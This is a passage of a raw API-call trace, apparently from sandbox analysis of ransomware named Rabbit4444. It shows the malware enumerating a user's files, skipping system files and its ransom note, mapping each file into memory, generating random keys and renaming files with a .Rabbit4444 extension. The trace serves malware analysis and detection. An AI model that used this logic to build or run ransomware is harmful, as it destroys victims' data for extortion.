lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=16775) returned 1 [0070.493] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0070.493] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0070.493] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4490, lpName=0x0) returned 0x2d0 [0070.494] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4490) returned 0x70000 [0070.495] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115288 [0070.496] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0070.496] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115288 | out: hHeap=0xe0000) returned 1 [0070.496] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0070.496] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11d948 [0070.496] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0070.496] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0070.496] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0070.496] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16180674852) returned 1 [0070.496] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0070.496] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0070.496] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.496] CloseHandle (hObject=0x2d0) returned 1 [0070.496] CloseHandle (hObject=0x29c) returned 1 [0070.496] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml.Rabbit4444") returned 170 [0070.497] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml.rabbit4444"), dwFlags=0x1) returned 1 [0070.497] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa894bd2e, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xa894bd2e, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x8625bd94, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x4360, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", cAlternateFileName="75EF5B~1.XML")) returned 1 [0070.497] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.497] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.497] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", lpString2="Rabbit4444.exe") returned -1 [0070.497] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", lpString2=".") returned 1 [0070.497] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", lpString2="..") returned 1 [0070.497] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", lpString2="windows") returned -1 [0070.497] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", lpString2="bootmgr") returned -1 [0070.497] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", lpString2="pagefile.sys") returned -1 [0070.498] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", lpString2="boot") returned -1 [0070.498] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", lpString2="ids.txt") returned -1 [0070.498] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", lpString2="NTUSER.DAT") returned -1 [0070.498] lstrcpyW (in: lpString1=0x130ec14, lpString2="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml" | out: lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml") returned="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml" [0070.498] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", dwFileAttributes=0x0) returned 1 [0070.498] lstrlenW (lpString="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml") returned 45 [0070.498] lstrlenW (lpString="Rabbit4444") returned 10 [0070.498] lstrcmpiW (lpString1="f_show.xml", lpString2="Rabbit4444") returned -1 [0070.498] lstrlenW (lpString=".dll") returned 4 [0070.498] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0070.498] lstrlenW (lpString=".lnk") returned 4 [0070.498] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0070.498] lstrlenW (lpString=".ini") returned 4 [0070.499] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0070.499] lstrlenW (lpString=".sys") returned 4 [0070.499] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0070.499] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.499] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.499] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16180977497) returned 1 [0070.499] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=17248) returned 1 [0070.499] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0070.499] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0070.499] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4660, lpName=0x0) returned 0x2d0 [0070.500] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4660) returned 0x70000 [0070.501] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115288 [0070.501] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0070.501] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115288 | out: hHeap=0xe0000) returned 1 [0070.501] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0070.501] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11d948 [0070.502] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0070.502] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0070.502] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0070.502] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16181253936) returned 1 [0070.502] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0070.502] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0070.502] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.502] CloseHandle (hObject=0x2d0) returned 1 [0070.502] CloseHandle (hObject=0x29c) returned 1 [0070.502] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml.Rabbit4444") returned 166 [0070.502] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml.rabbit4444"), dwFlags=0x1) returned 1 [0070.503] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8bae2c7, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xa8bae2c7, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x86556ca1, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x4473, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", cAlternateFileName="75EF5B~2.XML")) returned 1 [0070.503] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.503] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.503] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", lpString2="Rabbit4444.exe") returned -1 [0070.503] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", lpString2=".") returned 1 [0070.503] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", lpString2="..") returned 1 [0070.503] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", lpString2="windows") returned -1 [0070.503] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", lpString2="bootmgr") returned -1 [0070.503] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", lpString2="pagefile.sys") returned -1 [0070.503] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", lpString2="boot") returned -1 [0070.503] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", lpString2="ids.txt") returned -1 [0070.503] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", lpString2="NTUSER.DAT") returned -1 [0070.503] lstrcpyW (in: lpString1=0x130ec14, lpString2="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml" | out: lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml") returned="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml" [0070.503] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", dwFileAttributes=0x0) returned 1 [0070.504] lstrlenW (lpString="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml") returned 49 [0070.504] lstrlenW (lpString="Rabbit4444") returned 10 [0070.504] lstrcmpiW (lpString1="thdraw.xml", lpString2="Rabbit4444") returned 1 [0070.504] lstrlenW (lpString=".dll") returned 4 [0070.504] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0070.504] lstrlenW (lpString=".lnk") returned 4 [0070.504] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0070.504] lstrlenW (lpString=".ini") returned 4 [0070.504] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0070.504] lstrlenW (lpString=".sys") returned 4 [0070.504] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0070.504] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.504] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.504] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16181497352) returned 1 [0070.504] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=17523) returned 1 [0070.504] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0070.504] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0070.504] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4780, lpName=0x0) returned 0x2d0 [0070.505] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4780) returned 0x70000 [0070.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115288 [0070.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0070.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115288 | out: hHeap=0xe0000) returned 1 [0070.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0070.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11d948 [0070.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0070.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0070.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0070.507] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16181770092) returned 1 [0070.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0070.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0070.507] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.507] CloseHandle (hObject=0x2d0) returned 1 [0070.507] CloseHandle (hObject=0x29c) returned 1 [0070.507] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml.Rabbit4444") returned 170 [0070.507] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml.rabbit4444"), dwFlags=0x1) returned 1 [0070.508] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc766b3fd, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xc766b3fd, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xbbc2bb3b, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x418e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", cAlternateFileName="9984EC~1.XML")) returned 1 [0070.508] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.508] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.508] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", lpString2="Rabbit4444.exe") returned -1 [0070.508] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", lpString2=".") returned 1 [0070.508] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", lpString2="..") returned 1 [0070.508] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", lpString2="windows") returned -1 [0070.508] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", lpString2="bootmgr") returned -1 [0070.508] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", lpString2="pagefile.sys") returned -1 [0070.508] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", lpString2="boot") returned -1 [0070.508] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", lpString2="ids.txt") returned -1 [0070.508] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", lpString2="NTUSER.DAT") returned -1 [0070.508] lstrcpyW (in: lpString1=0x130ec14, lpString2="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml" | out: lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml") returned="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml" [0070.508] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", dwFileAttributes=0x0) returned 1 [0070.509] lstrlenW (lpString="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml") returned 45 [0070.509] lstrlenW (lpString="Rabbit4444") returned 10 [0070.509] lstrcmpiW (lpString1="2_show.xml", lpString2="Rabbit4444") returned -1 [0070.509] lstrlenW (lpString=".dll") returned 4 [0070.509] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0070.509] lstrlenW (lpString=".lnk") returned 4 [0070.509] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0070.509] lstrlenW (lpString=".ini") returned 4 [0070.509] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0070.509] lstrlenW (lpString=".sys") returned 4 [0070.509] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0070.509] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.510] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.510] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16182084664) returned 1 [0070.510] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=16782) returned 1 [0070.510] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0070.510] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0070.510] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4490, lpName=0x0) returned 0x2d0 [0070.511] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4490) returned 0x70000 [0070.512] CryptAcquireContextW (in: phProv=0x130bbd0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x130bbd0*=0x102150) returned 1 [0070.513] CryptGenRandom (in: hProv=0x102150, dwLen=0x80, pbBuffer=0x130bbec | out: pbBuffer=0x130bbec) returned 1 [0070.513] CryptReleaseContext (hProv=0x102150, dwFlags=0x0) returned 1 [0070.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115288 [0070.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0070.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115288 | out: hHeap=0xe0000) returned 1 [0070.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0070.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11d948 [0070.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0070.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0070.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0070.513] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16182407902) returned 1 [0070.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0070.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0070.513] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.514] CloseHandle (hObject=0x2d0) returned 1 [0070.514] CloseHandle (hObject=0x29c) returned 1 [0070.514] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml.Rabbit4444") returned 166 [0070.514] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml.rabbit4444"), dwFlags=0x1) returned 1 [0070.515] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc76b785f, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xc76b785f, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xbbb6d045, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x418c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", cAlternateFileName="9984EC~2.XML")) returned 1 [0070.515] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.515] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.515] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", lpString2="Rabbit4444.exe") returned -1 [0070.515] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", lpString2=".") returned 1 